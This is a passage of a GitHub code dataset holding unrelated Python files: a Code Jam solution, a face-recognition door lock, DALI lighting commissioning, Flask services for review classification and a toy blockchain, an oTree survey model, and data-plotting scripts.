concatenated_matches\n","repo_name":"CNES/cars","sub_path":"cars/applications/sparse_matching/sift.py","file_name":"sift.py","file_ext":"py","file_size_in_byte":30671,"program_lang":"python","lang":"en","doc_type":"code","stars":202,"dataset":"github-code","pt":"61"} +{"seq_id":"23418302371","text":"# GCJ Magic Trick\n\n## file io template\ninput = \"magician.in\"\noutput = \"magician.out\"\ndef fread(filename):\n with open(filename, \"r\") as fin:\n for line in fin:\n yield line.strip().split()\n\ndef fwrite(line):\n with open(output, 'a') as fout:\n fout.write(line)\n if \"\\n\" not in line:\n fout.write(\"\\n\")\n\nread = fread(input).next\n## end template\n\nT = int(read()[0])\n\nfor testcase in xrange(T):\n firstrownum = int(read()[0]) - 1\n for i in xrange(firstrownum):\n read() # skip lines until row chosen\n candidates = set(map(int, read()))\n for i in xrange(3-firstrownum):\n read() # skip rows after\n secondrownum = int(read()[0]) - 1\n for i in xrange(secondrownum):\n read() # skip lines until row chosen\n candidates &= set(map(int, read()))\n for i in xrange(3-secondrownum):\n read() # skip rows after\n overlap = len(candidates)\n if overlap == 1:\n fwrite(\"Case #\" + str(testcase+1) + \": \" + str(candidates.pop()))\n elif overlap == 0:\n fwrite(\"Case #\" + str(testcase+1) + \": Volunteer cheated!\")\n else:\n fwrite(\"Case #\" + str(testcase+1) + \": Bad magician!\")","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_135/3956.py","file_name":"3956.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40217091382","text":"# detector_webcam.py\n# Finding the person in front of the camera is anyone who stored in database\n# Using USB webcam or IP Cam (single threading)\n#\n# Project: Face Recognition using OpenCV and Raspberry Pi\n# Ref: https://www.pytorials.com/face-recognition-using-opencv-part-3/\n# By: Mickey Chan @ 2019\n\n# Import required modules\nimport cv2\nimport os\nimport sqlite3\nimport RPi.GPIO as GPIO\nimport time\n\n# Connect SQLite3 database\nconn = sqlite3.connect('database.db')\ndb = conn.cursor()\n\n# Assign the training data file\nfname = \"recognizer/trainingData.yml\"\nif not os.path.isfile(fname):\n print(\"Please train the data first\")\n exit(0)\n\n# Setup GPIO for door lock\nrelayPin = 26\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(relayPin, GPIO.OUT)\nGPIO.output(relayPin, 0)\n\nlastDetectedAt = 0\ndetectInterval = 5 # 1/n second, for 
reducing overhead\nlastUnlockedAt = 0\nunlockDuration = 5 # n second\n\n# Font used for display\nfont = cv2.FONT_HERSHEY_SIMPLEX\n\n# Connect to video source\n#vSource = \"rtsp://192.168.1.100:8554/live.sdp\" # RTSP URL of IP Cam\nvSource = 0 # first USB webcam\nvStream = cv2.VideoCapture(vSource)\n\n# Setup Classifier for detecting face\nfaceCascade = cv2.CascadeClassifier(\"haarcascade_frontalface_default.xml\")\n# Setup LBPH recognizer for face recognition\nrecognizer = cv2.face.createLBPHFaceRecognizer() # or LBPHFaceRecognizer_create()\n# Load training data\nrecognizer.load(fname) # change to read() for LBPHFaceRecognizer_create()\n\nwhile vStream.isOpened():\n # Lock the door again when timeout\n if time.time() - lastUnlockedAt > unlockDuration:\n GPIO.output(relayPin, 0)\n \n ok, frame = vStream.read() # Read frame\n if not ok: break\n \n timeElapsed = time.time() - lastDetectedAt\n if timeElapsed > 1./detectInterval:\n lastDetectedAt = time.time()\n \n # Detect face\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) # Convert captured frame to grayscale\n faces = faceCascade.detectMultiScale(gray, scaleFactor = 1.3, minNeighbors = 5) # Detect face(s) inside the frame\n \n for (x, y, w, h) in faces:\n # Try to recognize the face using recognizer\n roiGray = gray[y:y+h, x:x+w]\n id_, conf = recognizer.predict(roiGray)\n print(id_, conf)\n \n # If recognized face has enough confident (<= 70),\n # retrieve the user name from database,\n # draw a rectangle around the face,\n # print the name of the user and\n # unlock the door for 5 secords\n if conf <= 70:\n cv2.rectangle(frame, (x, y), (x+w, y+h), (0, 255, 0), 2)\n # retrieve user name from database\n db.execute(\"SELECT `name` FROM `users` WHERE `id` = (?);\", (id_,))\n result = db.fetchall()\n name = result[0][0]\n \n # You may do anything below for detected user, e.g. unlock the door\n GPIO.output(relayPin, 1) # Unlock\n lastUnlockedAt = time.time()\n print(\"[Unlock] \" + str(id_) + \":\" + name + \" (\" + str(conf) + \")\")\n cv2.putText(frame, name, (x+2,y+h-5), font, 1, (150,255,0), 2)\n else:\n cv2.rectangle(frame, (x, y), (x+w, y+h), (0, 0, 255), 2)\n GPIO.output(relayPin, 0) # Lock the door if not enough confident\n #print(\"[Lock] \" + name + \" \" + str(conf))\n #cv2.putText(frame, 'No Match', (x+2,y+h-5), font, 1, (0,0,255), 2)\n \n cv2.imshow(\"Face Recognizer\", frame)\n \n # Press ESC or 'q' to quit the program\n key = cv2.waitKey(1) & 0xff\n if key == 27 or key == ord('q'):\n break\n\n# Clean up\nvStream.release()\nconn.close()\ncv2.destroyAllWindows()\nGPIO.cleanup()\nprint(\"END\")\n","repo_name":"mickey9801/opencv_facerecognition","sub_path":"detector_webcam.py","file_name":"detector_webcam.py","file_ext":"py","file_size_in_byte":3786,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"25490519663","text":"# Useful sequences of commands\n\n# These command sequences can be passed to a driver for execution as a\n# transaction.\n\n# A command sequence is a generator co-routine. 
It yields a series of\n# objects, and optionally returns a result.\n\n# The command sequence can yield the following types of object:\n#\n# * dali.command.Command instances for execution; the response must be\n# passed back into the sequence via .send() on the generator\n#\n# * dali.sequence.sleep instances to request a delay in execution\n#\n# * dali.sequence.progress instances to provide updates on sequence execution\n\n# Sequences may raise exceptions, which the driver should pass to the\n# caller.\n\nfrom dali.exceptions import DALISequenceError, ProgramShortAddressFailure\n\nfrom dali.gear.general import *\nfrom dali.address import Broadcast, Short\n\n\nclass sleep:\n \"\"\"Delay for a while\n\n Yielded during a sequence to request that the caller wait for at\n least the specified length of time in seconds\n \"\"\"\n def __init__(self, delay):\n self.delay = delay\n\n\nclass progress:\n \"\"\"Progress information\n\n Yielded during a sequence to indicate how the sequence is\n proceeding. May indicate an amount of progress, a message, or\n both. The amount of progress is just an indication and there is\n no guarantee that it will not decrease as well as increase.\n \"\"\"\n def __init__(self, message=None, completed=None, size=None):\n self.message = message\n self.completed = completed\n self.size = size\n\n def __str__(self):\n if self.message:\n return self.message\n if self.completed is not None and self.size is not None:\n return f\"Progress: {self.completed}/{self.size}\"\n\n\ndef QueryDeviceTypes(addr):\n \"\"\"Obtain a list of part 2xx device types supported by control gear\n \"\"\"\n r = yield QueryDeviceType(addr)\n if r.raw_value is None:\n raise DALISequenceError(\"No response to initial query\")\n if r.raw_value.as_integer < 254:\n return [r.raw_value.as_integer]\n if r.raw_value.as_integer == 254:\n return []\n assert r.raw_value.as_integer == 255\n last_seen = 0\n result = []\n while True:\n r = yield QueryNextDeviceType(addr)\n if not r.raw_value:\n raise DALISequenceError(\n \"No response to QueryNextDeviceType()\")\n if r.raw_value.as_integer == 254:\n if len(result) == 0:\n raise DALISequenceError(\n \"No device types returned by QueryNextDeviceType\")\n return result\n if r.raw_value.as_integer <= last_seen:\n # The gear is required to return device types in\n # ascending order, without repeats\n raise DALISequenceError(\"Device type received out of order\")\n result.append(r.raw_value.as_integer)\n\n\ndef QueryGroups(addr):\n \"\"\"Obtain the group membership of control gear.\n\n Returns a set of integers.\n \"\"\"\n groups = set()\n g0 = yield QueryGroupsZeroToSeven(addr)\n if g0.raw_value is None:\n raise DALISequenceError(\"No response reading groups zero to seven\")\n if g0.raw_value.error:\n raise DALISequenceError(\"Framing error reading groups zero to seven\")\n g1 = yield QueryGroupsEightToFifteen(addr)\n if g1.raw_value is None:\n raise DALISequenceError(\"No response reading groups eight to fifteen\")\n if g1.raw_value.error:\n raise DALISequenceError(\"Framing error reading groups eight to fifteen\")\n g = g1.raw_value + g0.raw_value\n for i in range(0, 16):\n if g[i]:\n groups.add(i)\n return groups\n\n\ndef SetGroups(addr, groups):\n \"\"\"Set the group membership of control gear.\n\n groups is a set of integers in the range 0..15\n \"\"\"\n if isinstance(addr, Short) or isinstance(addr, int):\n existing = yield from QueryGroups(addr)\n for i in groups - existing:\n yield AddToGroup(addr, i)\n for i in existing - groups:\n yield RemoveFromGroup(addr, 
i)\n else:\n # Can't read from multiple devices: must write every group\n for i in range(0, 16):\n if i in groups:\n yield AddToGroup(addr, i)\n else:\n yield RemoveFromGroup(addr, i)\n\n\ndef _find_next(low, high):\n yield SetSearchAddrH((high >> 16) & 0xff)\n yield SetSearchAddrM((high >> 8) & 0xff)\n yield SetSearchAddrL(high & 0xff)\n\n r = yield Compare()\n\n if low == high:\n if r.value is True:\n return \"clash\" if r.raw_value.error else low\n return\n\n if r.value is True:\n midpoint = (low + high) // 2\n res = yield from _find_next(low, midpoint)\n if res is not None:\n return res\n return (yield from _find_next(midpoint + 1, high))\n\n\ndef Commissioning(available_addresses=None, readdress=False,\n dry_run=False):\n \"\"\"Assign short addresses to control gear\n\n If available_addresses is passed, only the specified addresses\n will be assigned; otherwise all short addresses are considered to\n be available.\n\n if \"readdress\" is set, all existing short addresses will be\n cleared; otherwise, only control gear that is currently\n unaddressed will have short addresses assigned.\n\n If \"dry_run\" is set then no short addresses will actually be set.\n This can be useful for testing.\n \"\"\"\n if available_addresses is None:\n available_addresses = list(range(64))\n else:\n available_addresses = list(available_addresses)\n\n if readdress:\n if dry_run:\n yield progress(message=\"dry_run is set: not deleting existing \"\n \"short addresses\")\n else:\n yield DTR0(255)\n yield SetShortAddress(Broadcast())\n else:\n # We need to know which short addresses are already in use\n for a in range(0, 64):\n if a in available_addresses:\n in_use = yield QueryControlGearPresent(Short(a))\n if in_use.value:\n available_addresses.remove(a)\n yield progress(\n message=f\"Available addresses: {available_addresses}\")\n\n yield Terminate()\n yield Initialise(broadcast=True if readdress else False)\n\n finished = False\n # We loop here to cope with multiple devices picking the same\n # random search address; when we discover that, we\n # re-randomise and begin again. 
Devices that have already\n # received addresses are unaffected.\n while not finished:\n yield Randomise()\n # Randomise can take up to 100ms\n yield sleep(0.1)\n\n low = 0\n high = 0xffffff\n\n while low is not None:\n yield progress(completed=low, size=high)\n low = yield from _find_next(low, high)\n if low == \"clash\":\n yield progress(message=\"Multiple ballasts picked the same \"\n \"random address; restarting\")\n break\n if low is None:\n finished = True\n break\n yield progress(\n message=f\"Ballast found at address {low:#x}\")\n if available_addresses:\n new_addr = available_addresses.pop(0)\n if dry_run:\n yield progress(\n message=\"Not programming short address \"\n f\"{new_addr} because dry_run is set\")\n else:\n yield progress(\n message=f\"Programming short address {new_addr}\")\n yield ProgramShortAddress(new_addr)\n r = yield VerifyShortAddress(new_addr)\n if r.value is not True:\n raise ProgramShortAddressFailure(new_addr)\n else:\n yield progress(\n message=\"Device found but no short addresses left\")\n yield Withdraw()\n if low < high:\n low = low + 1\n else:\n low = None\n finished = True\n yield Terminate()\n yield progress(message=\"Addressing complete\")\n","repo_name":"sde1000/python-dali","sub_path":"dali/sequences.py","file_name":"sequences.py","file_ext":"py","file_size_in_byte":8138,"program_lang":"python","lang":"en","doc_type":"code","stars":126,"dataset":"github-code","pt":"61"} +{"seq_id":"17610882766","text":"from flask import Flask, request, jsonify\nimport pickle\nfrom sklearn.naive_bayes import MultinomialNB\nimport jieba\nimport pandas as pd\nfrom sklearn.feature_extraction.text import CountVectorizer\nimport json\nfrom openpyxl import Workbook, load_workbook\n\n# 读取模型\nwith open('data/classifiers.pickle', 'rb') as f:\n classifiers = pickle.load(f)\n# 读取vectorizer对象\nwith open('data/vectorizer.pickle', 'rb') as f:\n vectorizer = pickle.load(f)\n# 读取分词表\nwith open('data/stopwords.txt', 'r', encoding='utf-8') as f:\n stopwords = f.read().splitlines()\n\n\napp = Flask(__name__)\nmp = {\"味道好\": 2, \"味道差\": 3, \"态度好\": 4, \"态度差\": 5, \"卫生状态\": 6, \"不新鲜\": 7, \"其他\": 8}\nlabels = [\"味道好\", \"味道差\", \"态度好\", \"态度差\", \"卫生状态\", \"不新鲜\", \"其他\"]\n\n# 使用模型分析数据 将分析的结果放入data/text.xlsx文件内保存,并返回对应text的json\ndef information_analysis_func(text):\n copy_text = text\n text = ' '.join(jieba.cut(text))\n text = ' '.join([word for word in text.split() if word not in stopwords])\n new_X = vectorizer.transform([text])\n js = {\"text\": copy_text, \"labels\": []}\n data = [copy_text]\n flg = False\n for label, clf in classifiers.items():\n proba = clf.predict_proba(new_X)[0, 1]\n # 如果概率大于0.5,就放入json里面\n print(f'{label}的概率为{proba:.2f}')\n flag = proba >= 0.5\n if flag:\n js[\"labels\"].append(label)\n flg = True\n data.append(1)\n else:\n data.append(0)\n if not flg:\n js[\"labels\"].append(\"其他\")\n data.append(1)\n else:\n data.append(0)\n # 打开现有的XLSX文件\n workbook = load_workbook('./data.xlsx')\n worksheet = workbook.active\n # 写入文件\n worksheet.append(data)\n # 保存文件\n workbook.save('./data.xlsx')\n return js\n\ndef get_information_func(label):\n flag = False\n if label == \"全部\":\n flag = True\n # 打开Excel文件\n workbook = load_workbook('data.xlsx')\n # 选择第一个工作表\n data = []\n worksheet = workbook.active\n # 获取行数和列数\n max_row = worksheet.max_row\n for i in range(2, max_row+1):\n if flag or worksheet.cell(row=i, column=mp[label]).value == 1:\n js = {\"text\": worksheet.cell(row=i, column=1).value, \"labels\": []}\n for key, value in mp.items():\n if worksheet.cell(row=i, 
column=value).value == 1:\n                    js[\"labels\"].append(key)\n            data.append(js)\n    return data\n\n\n\n# Test\n# print(information_analysis(\"这家店味道很好,服务员态度也很好,服务周到,下次还来\"))\n@app.route('/test', methods=['POST'])\ndef test():\n    return jsonify([{'text': '这家店味道很好,服务员态度也很好,服务周到,下次还来', 'labels': ['味道好', '态度好']}, {'text': '这家店味道很好,服务员态度也很好,服务周到,下次还来', 'labels': ['味道好', '态度好']}, {'text': '这家店味道很好,服务员态度也很好,服务周到,下次还来', 'labels': ['味道好', '态度好']}])\n\n@app.route('/information_analysis', methods=['POST'])\ndef information_analysis():\n    # Write the information analysis code here\n    data = request.get_json()\n    data = information_analysis_func(data[\"text\"])\n    print(data)\n    return jsonify(data)\n\n@app.route('/get_information', methods=['POST'])\ndef get_information():\n    # Write the information retrieval code here\n    data = request.get_json()\n    result = get_information_func(data[\"label\"])\n    return jsonify(result)\n\n@app.route('/get_information', methods=['GET'])\ndef get_information_number():\n    # Open the Excel file\n    workbook = load_workbook('data.xlsx')\n    # Select the first worksheet\n    data = []\n    worksheet = workbook.active\n    # Get the number of rows and columns\n    max_row = worksheet.max_row\n    # Total count\n    data.append(max_row-1)\n    for i in labels:\n        data.append(0)\n    for i in range(2, max_row+1):\n        for j in range(len(labels)):\n            if worksheet.cell(row=i, column=mp[labels[j]]).value == 1:\n                data[j+1] = data[j+1]+1\n    return jsonify({\"data\": data})\n\n\nif __name__ == '__main__':\n    app.run(host=\"0.0.0.0\", port=8989)\n","repo_name":"hyy-Chen/Multi-label-Categorization-Model-for-Restaurant-Evaluation-Based-on-natural-language-processing","sub_path":"git/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":4313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"12043852443","text":"\nimport os\n\ndef wsgiConfig(domain):\n\n    wsgiLoad=open(\"/etc/apache2/mods-available/wsgi.load\",\"w\")\n    wsgiLoad.writelines(\"LoadModule wsgi_module /usr/lib/apache2/modules/mod_wsgi.so\\n\")\n    wsgiLoad.close()\n    return True\n\nif __name__==\"__main__\":\n    wsgiConfig(\"pucsd.online\")\n\n","repo_name":"surajbhosale409/software-comprehension","sub_path":"scripts/serverConf/scripts/modWSGI/modWSGI.py","file_name":"modWSGI.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"8523680788","text":"from flask import Flask, jsonify,request\r\nfrom model.blockchain import Blockchain\r\nfrom model.hospital import Hospital\r\nfrom uuid import uuid4\r\n\r\napp = Flask(__name__)\r\n\r\n#Creating a blockchain\r\nblockchain=Blockchain()\r\n\r\n#Creating hospital\r\nhospital=Hospital()\r\n\r\n#creating an address for the node on the port 5000\r\nnode_address=str(uuid4()).replace('-','')\r\n\r\n#Mining a new block\r\n@app.route('/mine_block',methods=['GET'])\r\ndef mine_block():\r\n    previous_block=blockchain.get_previous_block()\r\n    previous_proof=previous_block['proof']\r\n    proof=blockchain.proof_of_work(previous_proof)\r\n    previous_hash=blockchain.hash(previous_block)\r\n    block=blockchain.create_block(proof,previous_hash)\r\n    response={'message':'Congratulations, you just mined a block!',\r\n              'index':block['index'],\r\n              'timestamp':block['timestamp'],\r\n              'proof':block['proof'],\r\n              'previous_hash':block['previous_hash'],\r\n              'transactions':block['transactions']}\r\n    return jsonify(response), 200\r\n\r\n@app.route('/get_chain',methods=['GET'])\r\ndef get_chain():\r\n    response={'chain':blockchain.chain,\r\n              'length':len(blockchain.chain)}\r\n    return jsonify(response), 
200\r\n\r\n@app.route('/is_valid',methods=['GET'])\r\ndef is_valid():\r\n is_valid=blockchain.is_chain_valid(blockchain.chain)\r\n if is_valid:\r\n return jsonify({'message':'All good.. The blockchain is valid.)'}),200\r\n else:\r\n return jsonify({'message':'Houston, we have a problem. The Blockchain is not valid'}),200\r\n \r\n#connecting all the nodes \r\n@app.route('/connect_node',methods=['POST'])\r\ndef connect_node():\r\n json=request.get_json()\r\n nodes=json.get('nodes')\r\n if nodes is None:\r\n return 'No node',400\r\n for node in nodes:\r\n blockchain.add_node(node)\r\n response={'message':'All the nodes are connected now. It contains the following nodes:',\r\n 'total_nodes':list(blockchain.nodes)}\r\n return jsonify(response),201\r\n\r\n@app.route('/replace_chain',methods=['GET'])\r\ndef replace_chain():\r\n is_chain_replaced=blockchain.replace_chain()\r\n if is_chain_replaced==True:\r\n return jsonify({'message':'The nodes had different chains so the chain was replaced by the longest one.',\r\n 'new_chain':blockchain.chain}),200\r\n else:\r\n return jsonify({'message':'All good. The chain is the largest one.',\r\n 'actual_chain':blockchain.chain}),200\r\n \r\napp.run(host='0.0.0.0',port=5003)","repo_name":"Praveen-CloudLearn/blockchain","sub_path":"Hospital_controller_5003.py","file_name":"Hospital_controller_5003.py","file_ext":"py","file_size_in_byte":2537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42889420772","text":"from otree.api import (\n models,\n widgets,\n BaseConstants,\n BaseSubsession,\n BaseGroup,\n BasePlayer,\n Currency as c,\n currency_range,\n)\nimport itertools\nimport random\nfrom django.utils.safestring import mark_safe\n\nauthor = 'Anne Mensing, Julia Lauten, Kateryna Kuian, Moritz Gottschling'\n\ndoc = \"\"\"\nThis is the source code for the experiment for our bms seminar paper 2020.\n\"\"\"\n\n\nclass Constants(BaseConstants):\n name_in_url = 'bms_experiment'\n players_per_group = None\n num_rounds = 2\n\n labels = {\n 'age': 'Age:',\n 'gender': 'Gender:',\n 'installed': 'Have you installed the Corona-Warn-App?',\n\n 'competence': 'The app will be able to keep my personal data secured.',\n 'competence_neg': 'The app lacks the necessary competence to protect my data.',\n\n 'benevolence': 'The app was made to collect my personal data.',\n 'benevolence_neg': 'The app acts in my interest.',\n\n 'no_central_entity': 'The app does not store my personal data on a central server.',\n 'no_central_entity_neg': 'The personal data of mine is stored by the app on a central server.',\n 'anonymity': 'The app does not allow other users to access/view my personal data.',\n 'anonymity_neg': 'My personal data can be accessed/viewed by other users of the app.',\n 'no_tracking': 'The app will track my location and collect personal data on my phone.',\n 'no_tracking_neg': 'My location and personal data from my phone can not be collected by the '\n 'app.',\n 'unlinkabilty': 'The app prevents linking back the collected data to my person.',\n 'unlinkabilty_neg': 'Using the app it is possible to link the collected data back to my person.',\n\n 'activity': 'What does the app do while being active?',\n 'data_stored': 'What data does the app store?',\n 'warnings': 'When are warnings given?',\n 'infected': 'What happens when you had contact with an infected person?',\n\n 'understanding': 'Please rate your technical understanding of the Corona-Warn-App.',\n }\n\n m_choice_questions = {\n 'q1': {\n 'text': 'What do 
two phones that have the app installed exchange?',\n 'answers': {\n 'a1': 'They exchange GPS coordinates',\n 'a2': 'They exchange data about your person ',\n 'a3': 'They exchange randomly generated keys',\n 'a4': 'They exchange a key that is assigned to you after installation of the app ',\n 'a5': 'I am not sure',\n }\n },\n 'q2': {\n 'text': 'What data is stored centrally?',\n 'answers': {\n\n 'a1': 'Location data',\n 'a2': 'List of names of people infected',\n 'a3': 'Randomly generated keys of all users',\n 'a4': 'None of the above',\n 'a5': 'I am not sure',\n }\n },\n 'q3': {\n 'text': 'Which encounter would lead to a high risk assessment for the other person in case you test '\n 'positive within the following 14 days?',\n 'answers': {\n 'a1': 'Sitting next to this person on the bus for 2 hours',\n 'a2': 'Passing by this person with less than 1.5 meter distance between you ',\n 'a3': 'Sitting on opposite sides of the movie theater while watching a movie',\n 'a4': 'Meeting this person for coffee in a cafe for 1 hour',\n 'a5': 'I am not sure',\n }\n },\n 'q4': {\n 'text': 'What happens if you are classified as “high risk” in the Corona-Warn-App?',\n 'answers': {\n 'a1': 'The health department will contact you to ask about your symptoms and assess whether a '\n 'COVID-19 test is necessary',\n 'a2': 'Your key will be automatically uploaded to the server',\n 'a3': 'You will be quarantined for 14 days',\n 'a4': 'It will be upon you to take action',\n 'a5': 'I am not sure',\n }\n },\n }\n\n\nclass Subsession(BaseSubsession):\n def creating_session(self):\n # randomize to treatments\n # transparency_conditions = itertools.cycle(['no', 'brief', 'detailed'])\n for player in self.get_players():\n # player.participant.vars['tr'] = next(transparency_conditions)\n player.participant.vars['tr'] = 'unassigned'\n\n\nclass Group(BaseGroup):\n pass\n\n\ndef make_radio(label):\n return models.IntegerField(\n choices=[\n [1, mark_safe('Totally Disagree')],\n [2, mark_safe('Disagree')],\n [3, mark_safe('Undecided/Not sure')],\n [4, mark_safe('Agree')],\n [5, mark_safe('Totally Agree')],\n ],\n label=mark_safe(label),\n widget=widgets.RadioSelectHorizontal,\n )\n\n\ndef make_answer(label):\n return models.BooleanField(\n label=label,\n widget=widgets.CheckboxInput,\n blank=True\n )\n\n\ndef make_attentive():\n return models.StringField(\n choices=['red', 'orange', 'yellow', 'green', 'blue', 'purple', 'pink', 'white', 'gray', 'brown', 'black'],\n label='What was the color?'\n )\n\n\nclass Player(BasePlayer):\n # automatically selected\n trans_cond = models.StringField();\n # general information\n age = models.IntegerField(label=Constants.labels['age'])\n gender = models.IntegerField(\n choices=random.sample([\n [0, 'Female'],\n [1, 'Male'],\n [2, 'Diverse'],\n ], 3),\n max=99,\n min=0,\n widget=widgets.RadioSelectHorizontal\n )\n installed = models.BooleanField(label=Constants.labels['installed'], widget=widgets.RadioSelectHorizontal)\n # trust\n # competence\n competence = make_radio(Constants.labels['competence'])\n competence_neg = make_radio(Constants.labels['competence_neg'])\n # benevolence\n benevolence = make_radio(Constants.labels['benevolence'])\n benevolence_neg = make_radio(Constants.labels['benevolence_neg'])\n # integrity\n no_central_entity = make_radio(Constants.labels['no_central_entity'])\n no_central_entity_neg = make_radio(Constants.labels['no_central_entity_neg'])\n anonymity = make_radio(Constants.labels['anonymity'])\n anonymity_neg = make_radio(Constants.labels['anonymity_neg'])\n 
no_tracking = make_radio(Constants.labels['no_tracking'])\n no_tracking_neg = make_radio(Constants.labels['no_tracking_neg'])\n unlinkabilty = make_radio(Constants.labels['unlinkabilty'])\n unlinkabilty_neg = make_radio(Constants.labels['unlinkabilty_neg'])\n # understanding\n # perceived\n understanding = models.IntegerField(\n choices=[\n [1, 'No understanding'],\n [2, 'Limited understanding'],\n [3, 'Moderate understanding'],\n [4, 'Good understanding'],\n [5, 'Complete understanding'],\n ],\n label=mark_safe(Constants.labels['understanding']),\n widget=widgets.RadioSelect,\n )\n\n # actual\n q1_a1 = make_answer(Constants.m_choice_questions['q1']['answers']['a1'])\n q1_a2 = make_answer(Constants.m_choice_questions['q1']['answers']['a2'])\n q1_a3 = make_answer(Constants.m_choice_questions['q1']['answers']['a3'])\n q1_a4 = make_answer(Constants.m_choice_questions['q1']['answers']['a4'])\n q1_a5 = make_answer(Constants.m_choice_questions['q1']['answers']['a5'])\n\n q2_a1 = make_answer(Constants.m_choice_questions['q2']['answers']['a1'])\n q2_a2 = make_answer(Constants.m_choice_questions['q2']['answers']['a2'])\n q2_a3 = make_answer(Constants.m_choice_questions['q2']['answers']['a3'])\n q2_a4 = make_answer(Constants.m_choice_questions['q2']['answers']['a4'])\n q2_a5 = make_answer(Constants.m_choice_questions['q2']['answers']['a5'])\n\n q3_a1 = make_answer(Constants.m_choice_questions['q3']['answers']['a1'])\n q3_a2 = make_answer(Constants.m_choice_questions['q3']['answers']['a2'])\n q3_a3 = make_answer(Constants.m_choice_questions['q3']['answers']['a3'])\n q3_a4 = make_answer(Constants.m_choice_questions['q3']['answers']['a4'])\n q3_a5 = make_answer(Constants.m_choice_questions['q3']['answers']['a5'])\n\n q4_a1 = make_answer(Constants.m_choice_questions['q4']['answers']['a1'])\n q4_a2 = make_answer(Constants.m_choice_questions['q4']['answers']['a2'])\n q4_a3 = make_answer(Constants.m_choice_questions['q4']['answers']['a3'])\n q4_a4 = make_answer(Constants.m_choice_questions['q4']['answers']['a4'])\n q4_a5 = make_answer(Constants.m_choice_questions['q4']['answers']['a5'])\n\n # attentive\n attentive_1 = make_attentive()\n attentive_2 = make_attentive()\n # finished\n finished = models.BooleanField()\n","repo_name":"mogottsch/bms_experiment_2020","sub_path":"oTree/bms_experiment/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":8974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29315185813","text":"import pandas as pd\r\n\r\n\r\ndef get_stats(df):\r\n statistics = {}\r\n values = {}\r\n new_df = df.copy()\r\n mean = []\r\n max = []\r\n min = []\r\n\r\n numeric = ['Age', 'Annual_Premium', 'Vintage']\r\n\r\n for column in new_df:\r\n if column not in numeric:\r\n pass\r\n vals = new_df[column].value_counts(normalize=True)\r\n values[column] = vals\r\n\r\n for column in numeric:\r\n mean.append(new_df[column].mean())\r\n max.append(new_df[column].max())\r\n min.append(new_df[column].min())\r\n\r\n statistics['mean'] = mean\r\n statistics['max'] = max\r\n statistics['min'] = min\r\n\r\n statistics = pd.DataFrame.from_dict(statistics)\r\n\r\n statistics.index = numeric\r\n\r\n age_labels = ['< 30', '30 - 60 ', '60 +']\r\n premium_labels = ['< 10 000', '10 001 - 20 000', '20 001 - 40 000', '40 001 - 80 000', '80 001 - 100 000',\r\n '100 000 +']\r\n vintage_labels = ['< 100', '101 - 200', '200+']\r\n\r\n age_bins = [0, 31, 61, 200]\r\n premium_bins = [0, 10001, 20001, 40001, 80001, 100001, 99999999]\r\n 
vintage_bins = [0, 101, 201, 99999]\r\n\r\n new_df['Age'] = pd.cut(\r\n new_df['Age'], age_bins, labels=age_labels)\r\n new_df['Annual_Premium'] = pd.cut(\r\n new_df['Annual_Premium'], premium_bins, labels=premium_labels)\r\n new_df['Vintage'] = pd.cut(\r\n new_df['Vintage'], vintage_bins, labels=vintage_labels)\r\n\r\n for column in numeric:\r\n vals = new_df[column].value_counts(normalize=True)\r\n values[column] = vals\r\n\r\n return statistics, values\r\n","repo_name":"dcesarz/IO_Project_2","sub_path":"stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"504858166","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\ndf = pd.read_csv('st-flux.csv')\ng1 = df['group1']\ng2 = df['group2']\ng3 = df['group3']\ng4 = df['group4']\ng5 = df['group5']\ng6 = df['group6']\ntemp = df['temp']\nx = df['arc_length']\n\ndfq = pd.read_csv('eq-flux.csv')\ng1q = dfq['group1']\ng2q = dfq['group2']\ng3q = dfq['group3']\ng4q = dfq['group4']\ng5q = dfq['group5']\ng6q = dfq['group6']\ntempq = dfq['temp']\n#x = df['arc_length']\n\ndfl = pd.read_csv('el-flux.csv')\ng1l = dfl['group1']\ng2l = dfl['group2']\ng3l = dfl['group3']\ng4l = dfl['group4']\ng5l = dfl['group5']\ng6l = dfl['group6']\ntempl = dfl['temp']\n#x = df['arc_length']\n\nf = g1 + g2 + g3 + g4 + g5 + g6\nfq = g1q + g2q + g3q + g4q + g5q + g6q\nfl = g1l + g2l + g3l + g4l + g5l + g6l\n\nfig, ax = plt.subplots()\n#ax.set_xscale('log')\n#ax.set_yscale('log')\nax.plot(x[:1000], f[:1000], label=r'Start-up')\nax.plot(x[:1000], fl[:1000], label=r'Early-life')\nax.plot(x[:1000], fq[:1000], label=r'Equilibrium')\nax.plot(0, 8.6e15, label=r'Fiorina et al.', marker='x')\n#ax.plot(ts[1:], gs1[1:], label=r'Step')\nax.set_xlabel(r'Radius [cm]')\nax.set_ylabel(r'Total neutron flux [# cm$^{-2}$ s$^{-1}$]')\nax.legend()\nplt.savefig('totalflux.png', dpi=400)\n\nfig, ax = plt.subplots()\n#ax.set_xscale('log')\n#ax.set_yscale('log')\nax.plot(x[:1000], temp[:1000], label=r'Start-up')\nax.plot(x[:1000], templ[:1000], label=r'Early-life')\nax.plot(x[:1000], tempq[:1000], label=r'Equilibrium')\n#ax.plot(ts[1:], gs1[1:], label=r'Step')\nax.set_xlabel(r'Radius [cm]')\nax.set_ylabel(r'Temperature [K]')\nax.legend()\n\nfig, ax = plt.subplots()\n#ax.set_xscale('log')\n#ax.set_yscale('log')\nax.plot(x[:1000], g1[:1000], label=r'Group 